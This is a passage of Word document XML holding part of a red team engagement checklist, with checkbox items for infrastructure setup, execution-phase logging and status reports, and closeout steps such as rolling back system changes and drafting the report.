      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>☐</w:t>
      </w:r>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> IPs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD218DB" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>☐</w:t>
      </w:r>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> Systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="391049EC" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>☐</w:t>
      </w:r>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> Redirectors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F0BDB3" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>☐</w:t>
      </w:r>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> PPS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EAA4322" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>☐</w:t>
      </w:r>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> Deploy tools to infrastructure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14DE57A8" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>☐</w:t>
      </w:r>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> Data collection repository</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D57584" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>EXECUTION - RED TEAM ENGAGEMENT CHECKLIST</w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:anchor="execution---red-team-engagement-checklist" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00B517C0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="080A0640" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>☐</w:t>
      </w:r>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> Daily completion and roll-up confirmation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039E68B2" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>☐</w:t>
      </w:r>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> Capture logs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2324EA" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>☐</w:t>
      </w:r>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> Capture screenshots</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="324C2450" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>☐</w:t>
      </w:r>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> Capture system changes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E19DBEB" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>☐</w:t>
      </w:r>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> Daily (or twice daily) mandatory internal RT SITREP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31168B75" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>☐</w:t>
      </w:r>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> Update real-time attack diagram</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F0CD1D" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>CULMINATION - RED TEAM ENGAGEMENT CHECKLIST</w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:anchor="culmination---red-team-engagement-checklist" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00B517C0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="58F9A18F" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>☐</w:t>
      </w:r>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> Engagement Closeout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB7C47C" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>☐</w:t>
      </w:r>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> Roll up data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F9CB92" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>☐</w:t>
      </w:r>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> Roll back system changes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31038A10" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>☐</w:t>
      </w:r>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> Validate data has been collected</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD46279" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>☐</w:t>
      </w:r>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> Outline critical attack diagram</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D2B3EB" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>☐</w:t>
      </w:r>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> Technical Review (tech-on-tech)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4D10DE" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>☐</w:t>
      </w:r>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> Executive Brief</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668CEDF6" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>☐</w:t>
      </w:r>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> Reporting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4791E3FD" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>☐</w:t>
      </w:r>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> Draft attack narrative</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E430C9" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
